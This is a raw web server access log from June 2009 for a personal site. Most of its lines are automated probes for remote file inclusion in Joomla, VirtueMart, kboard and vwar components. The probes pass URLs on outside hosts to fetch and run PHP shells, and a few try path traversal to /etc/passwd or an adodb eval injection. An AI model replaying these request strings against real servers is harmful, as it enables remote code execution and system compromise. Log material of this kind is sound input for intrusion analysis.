83.98.209.71 - - [25/Jun/2009:08:00:54 -0700] "GET /~t290/logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/components "-" "libwww-perl/5.79" 0 web.hypersurf.com
83.98.209.71 - - [25/Jun/2009:08:00:54 -0700] "GET /~t290/logs/access.log.0/components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 353 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
218.38.136.251 - - [25/Jun/2009:08:27:27 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
218.38.136.251 - - [25/Jun/2009:08:27:27 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
218.38.136.251 - - [25/Jun/2009:08:27:27 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [25/Jun/2009:08:30:13 -0700] "GET /~t290/logs//include/write.php?dir=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//include "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [25/Jun/2009:08:30:13 -0700] "GET /~t290//include/write.php?dir=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 304 /home/users/t/t290/public_html/include "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [25/Jun/2009:08:30:19 -0700] "GET /~t290/logs/access.log.0//include/write.php?dir=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.55.230.230 - - [25/Jun/2009:08:32:45 -0700] "GET /~t290/twllpicts/loonlake2/source/5.htm HTTP/1.1" 200 643 /home/users/t/t290/public_html/twllpicts/loonlake2/source/5.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
218.38.136.251 - - [25/Jun/2009:08:35:01 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [25/Jun/2009:08:59:36 -0700] "GET /~t290/twllpicts/island/source/1.htm HTTP/1.0" 200 607 /home/users/t/t290/public_html/twllpicts/island/source/1.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
201.232.54.48 - - [25/Jun/2009:09:03:05 -0700] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
201.232.54.48 - - [25/Jun/2009:09:03:05 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
201.232.54.48 - - [25/Jun/2009:09:03:05 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:12:26 -0700] "GET /~t290/logs/access.log.0//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:12:28 -0700] "GET /~t290/logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:12:28 -0700] "GET /~t290//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [25/Jun/2009:09:13:42 -0700] "GET /~t290/logs/access.log.0//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [25/Jun/2009:09:13:42 -0700] "GET /~t290/logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [25/Jun/2009:09:13:42 -0700] "GET /~t290//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [25/Jun/2009:09:14:54 -0700] "GET /~t290/logs/access.log.0%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:20:24 -0700] "GET /~t290//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:20:30 -0700] "GET /~t290/logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs//kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:20:30 -0700] "GET /~t290/logs/access.log.0//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:30 -0700] "GET /~t290/logs/access.log.0/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:30 -0700] "GET /~t290/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 303 /home/users/t/t290/public_html/include "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:30 -0700] "GET /~t290/logs/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs/include "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:47 -0700] "GET /~t290/logs/access.log.0/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:47 -0700] "GET /~t290/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 303 /home/users/t/t290/public_html/include "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:23:47 -0700] "GET /~t290/logs/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs/include "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:28:45 -0700] "GET /~t290/logs/access.log.0%20%20/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.10.159.229 - - [25/Jun/2009:09:29:14 -0700] "GET /~t290/logs/access.log.0%20%20/include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
201.232.54.48 - - [25/Jun/2009:09:32:24 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
202.181.243.113 - - [25/Jun/2009:09:32:51 -0700] "GET /~t290/logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 335 /home/users/t/t290/public_html/logs//assets "-" "Mozilla/4.61 (Macintosh; I; PPC)" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:02 -0700] "GET /~t290/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:02 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:02 -0700] "GET /~t290/logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:35:15 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:35:15 -0700] "GET /~t290/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:35:15 -0700] "GET /~t290/logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:39 -0700] "GET /~t290/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:39 -0700] "GET /~t290/logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [25/Jun/2009:09:35:39 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:18 -0700] "GET /~t290/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:18 -0700] "GET /~t290/logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:18 -0700] "GET /~t290/logs/access.log.0/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:19 -0700] "GET /~t290/logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:19 -0700] "GET /~t290/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
89.234.63.110 - - [25/Jun/2009:09:36:19 -0700] "GET /~t290/logs/access.log.0%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:42:11 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/_a?? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:42:11 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/_a?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:42:11 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/_a?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:42:28 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/cfg?? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:42:28 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/cfg?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:44:23 -0700] "GET /~t290/logs/access.log.0%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/_a?? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
85.17.162.28 - - [25/Jun/2009:09:45:46 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oilshalereserves.com/cp/scripts/cfg?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" 0 web.hypersurf.com /home/users/t/t290/public_html/logs/access.log.085.17.162.28 - - [25/Jun/2009:09:45:46 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?
89.234.63.110 - - [25/Jun/2009:09:46:22 -0700] "GET /~t290/logs/access.log.0/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [25/Jun/2009:09:47:16 -0700] "GET /~t290/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [25/Jun/2009:09:47:17 -0700] "GET /~t290/logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs/components "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [25/Jun/2009:09:47:17 -0700] "GET /~t290/logs/access.log.0%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:33 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:33 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:33 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:35 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:36 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:36 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290/logs/access.log.0%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290/logs/access.log.0%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:41 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:59 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:59 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:54:59 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [25/Jun/2009:09:55:15 -0700] "GET /~t290/logs/awstats.t290.unknownos.html HTTP/1.0" 404 306 /home/users/t/t290/public_html/logs/awstats.t290.unknownos.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:56:50 -0700] "GET /~t290//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 323 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:56:50 -0700] "GET /~t290/logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [25/Jun/2009:09:56:50 -0700] "GET /~t290/logs/access.log.0//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [25/Jun/2009:09:57:56 -0700] "GET /~t290/logs/access.log.0/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
